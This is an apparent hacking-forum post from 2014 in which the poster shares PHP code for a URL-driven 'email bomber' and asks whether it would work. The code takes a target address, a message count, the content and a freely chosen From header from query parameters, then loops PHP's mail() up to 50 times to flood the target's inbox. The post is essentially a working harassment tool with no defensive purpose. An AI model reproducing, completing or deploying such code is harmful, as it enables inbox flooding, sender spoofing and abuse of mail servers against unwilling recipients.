would this work 08-10-2014, 11:20 PM
#1
I'm trying to make a url based email bomber like an api and i'm not sure if this would work
PHP Code:
<?php
$num = 1;
$email =$_GET['email'];
$spam =$_GET['spam'];
$subject =$_GET['subject'];
$message =$_GET['message'];
$from =$_GET['from'];
$send =$_GET['send'];
if($spam!='' && $email=='')
{
die('Please enter an email');
}
if(51<=$spam)
{
die('Error: Number to spam to large. Max is 50 (for security reasons)');
}
if($email != '')
{
while($num<=$spam)
{
mail ($email, $subject, $message, "From: " . $from);
echo $num . "<br>";
$num++;
}
}
?>
![[Image: addskype.png?u=space.bukkit]](http://hatscripts.com/addskype.png?u=space.bukkit)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)